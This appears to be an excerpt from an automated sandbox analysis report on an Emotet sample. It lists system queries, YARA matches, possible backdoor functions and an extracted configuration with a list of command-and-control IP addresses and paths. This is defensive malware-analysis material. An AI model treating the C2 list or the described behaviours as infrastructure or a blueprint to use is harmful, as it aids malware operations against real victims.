Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,13_2_004599CE
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: GetLocaleInfoA,13_2_004619BF
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: GetLocaleInfoA,13_2_0045BBC3
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: _LcidFromHexString,GetLocaleInfoA,13_2_0045BCA5
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,13_2_0045BD3B
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: _LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,13_2_0045BDAD
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: _LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,13_2_0045BF7D
Contains functionality to query CPU information (cpuid)Show sources
Source: C:\Users\user\879.exeCode function: 12_2_00455551 cpuid 12_2_00455551
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Windows\SysWOW64\wget.exeQueries volume information: C:\Users\user\Desktop\download VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Users\user\879.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\879.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\879.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\879.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\879.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\879.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\879.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeQueries volume information: C:\ VolumeInformationJump to behavior
Contains functionality to query local / system timeShow sources
Source: C:\Users\user\879.exeCode function: 12_2_004475B7 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,12_2_004475B7
Contains functionality to query time zone informationShow sources
Source: C:\Users\user\879.exeCode function: 12_2_0044F600 __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,12_2_0044F600
Contains functionality to query windows versionShow sources
Source: C:\Users\user\879.exeCode function: 12_2_0043C85E GetStartupInfoA,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,_fast_error_exit,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,_fast_error_exit,_fast_error_exit,__RTC_Initialize,__ioinit,GetCommandLineA,___crtGetEnvironmentStringsA,__setargv,__setenvp,__cinit,__wincmdln,12_2_0043C85E
Queries the cryptographic machine GUIDShow sources
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information:

barindex
Yara detected EmotetShow sources
Source: Yara matchFile source: 0000000C.00000002.2126423927.00000000007A1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000002.2421877565.0000000000670000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000C.00000002.2126369833.0000000000790000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000002.2421897150.0000000000681000.00000020.00000001.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)Show sources
Source: C:\Users\user\879.exeCode function: 12_2_0040EE65 CreateBindCtx,12_2_0040EE65
Source: C:\Users\user\879.exeCode function: 12_2_0040FFD4 __ehhandler$___std_fs_change_permissions@12,__EH_prolog3_GS,lstrlenW,__snprintf_s,CreateBindCtx,12_2_0040FFD4
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: 13_2_0040EE65 CreateBindCtx,13_2_0040EE65
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: 13_2_0040FFD4 __ehhandler$___std_fs_change_permissions@12,__EH_prolog3_GS,lstrlenW,__snprintf_s,CreateBindCtx,13_2_0040FFD4

Malware Configuration

Threatname: Emotet

{"C2 list": ["71.126.247.90/9VRKRX4VeY", "104.236.28.47/z97ZWdfizXfGwwe", "104.236.28.47:8080", "80.86.91.91:8080", "80.86.91.91/otfaQrdMERYnyFW", "98.239.119.52/eKuzQTBgBoX", "0.86.91.91:8080"]}

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process